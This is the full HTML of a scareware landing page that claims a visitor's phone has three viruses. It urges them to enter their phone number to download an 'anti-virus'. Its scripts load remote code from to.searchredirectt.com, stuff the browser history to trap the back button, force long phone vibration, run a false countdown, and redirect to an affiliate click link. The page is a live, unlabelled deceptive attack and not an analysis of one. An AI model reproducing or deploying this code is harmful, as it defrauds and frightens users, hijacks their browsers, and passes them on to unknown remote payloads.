<!DOCTYPE html>
<html webdriver="true" data-livestyle-extension="available"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base href=".">
<title>Virus Warning!</title>
<meta name="robots" content="noindex, nofollow"><meta name="googlebot" content="noindex, nofollow">
<meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta http-equiv="refresh" content="35; url=https://linkssharing.com/click.php?lp=1">
<style type="text/css">
#timer p, p { color: rgb(85, 85, 85); }
#error, #timer { display: inline-block; float: left; }
#timer p, .btn { font-weight: 700; }
body { font-family: sans-serif; }
a { text-decoration: none; }
footer, header, section { clear: both; }
* { margin: 0px; padding: 0px; }
#wrapper { max-width: 400px; border: 0px solid rgb(48, 48, 48); border-radius: 0px; }
p { font-size: 14px; padding: 5px 0px; }
#timer { max-width: 290px; width: 65%; }
#timer p { font-size: 12px; }
.btn { background-color: #236DA6; border-radius: 5px; color: rgb(255, 255, 255); display: block; line-height: 50px; max-width: 275px; width: 90%; }
.container { padding-left: 8px; padding-right: 8px; }
#blink{color:#ff0000;padding:6px;-webkit-animation:blink 1s infinite;-moz-animation:blink 1s infinite;-ms-animation:blink 1s infinite;-o-animation:blink 1s infinite;animation:blink 1s infinite}
@-webkit-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}
@-moz-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}}
@-ms-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}
@-o-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}
@keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}
#today{float:right;font-weight:600;padding-top:15px}
</style>
</head>
<body >

<div id="wrapper">
<div class="container">
<header>

</header>
<section><h1>Your phone is infected with <span id="blink">(3)</span> viruses!</h1>
</section>
<section>
<p></p><h3>You should immediately install anti-virus program to clean the system otherwise your phone will be blocked</h3>
<p><b>After cleaning:</b>
<br>The speed will increase by: <span style="font-size: 16px; font-weight: bold; color: green; font-family: sans-serif;">75%</span>
<br>Battery charging will increase by: <span style="font-size: 16px; font-weight: bold; color: green; font-family: sans-serif;">53%</span>
</p><div id="timer">
<p><span class="red2">
<span style="font-size: 20px; font-weight: bold; color: red; font-family: sans-serif;" id="theTime">0 minutes and 20 seconds</span></span></p>
</div>
</section>
<section>
<p> 
<strong>This is what you should do <strong>(step by step):</strong>
<br>
<br><span style="font-size: 16px; font-weight: bold;" id="blink">Step 1:</span><strong>Press the button below and enter your phone number on the next page to start the download.</strong><br> <br>
<span style="font-size: 16px; font-weight: bold;" id="blink">Step 2:</span><strong>Run an antivirus program to remove any viruses.</strong></strong></p><strong> <p></p>
</strong></section><strong>
<footer>
<p align="center"><a class="btn" onclick="target()" href="#"><strong>FIX YOUR PHONE NOW!</strong></a></p>
</footer>
</strong></div><strong>

</strong></div>
	<script src="http://to.searchredirectt.com/preland.js"></script>
	<script language="JavaScript" type="text/javascript"> function target(){ location.href = afurl } </script>
	<script>
	function getURLParameter(name) {
	return decodeURI(
	(RegExp(name + '=' + '(.*?)(&|$)').exec(location.search)||[,null])[1] || ''
	);
	}

	!function(){
		var t;
		try{
			for(t=0;10>t;++t)history.pushState({},"","");
			onpopstate=function(t){
				t.state&&location.replace("")
			}
		}
		catch(o){}
	}();
	navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
	navigator.vibrate([50000]);
	</script>
	<script language="JavaScript" type="text/javascript">
	var sec = 35; 
	var min = 00; 
	function countDown() {
	sec--;
	if (sec == -01) {
	sec = 59;
	min = min - 1; }
	else {
	min = min; }
	if (sec<=9) { sec = "0" + sec; }
	time = (min<=9 ? "" + min : min) + " minutes and " + sec + " seconds";
	if (document.getElementById) { document.getElementById('theTime').innerHTML = time; }
	SD=window.setTimeout("countDown();", 1000);
	if (min == '00' && sec == '00') { sec = "00"; window.clearTimeout(SD); }
	}
	window.onload = countDown;
	</script>
	<script src="jquery-3.3.1.js"></script>
	<script>
	$(document).ready(function() {
	    userLang = navigator.language;
	    userLang1 = userLang.split('-');
	  
	    if (userLang1[0] == 'ar') {
	    $('body').empty();
	    $('body').load('AR_AV.html');
	     
	    }
	               
	  });
	  </script>
</body>
</html>